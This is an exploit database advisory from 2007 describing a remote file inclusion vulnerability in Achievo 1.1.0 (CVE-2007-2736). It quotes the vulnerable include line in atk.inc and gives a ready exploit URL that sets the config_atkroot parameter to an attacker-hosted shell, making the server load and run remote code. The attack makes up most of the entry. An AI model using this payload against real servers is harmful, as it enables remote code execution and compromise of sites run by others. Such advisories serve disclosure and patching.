Achievo 1.1.0 atk.inc config_atkroot Remote File Inclusion Vulnerability

2007-05-15T00:00:00
ID EDB-ID:3928
Type exploitdb
Reporter Katatafish
Modified 2007-05-15T00:00:00

Description

Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability. CVE-2007-2736. Webapps exploit for php platform

                                        
                                            ## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# milw0rm.com [2007-05-15]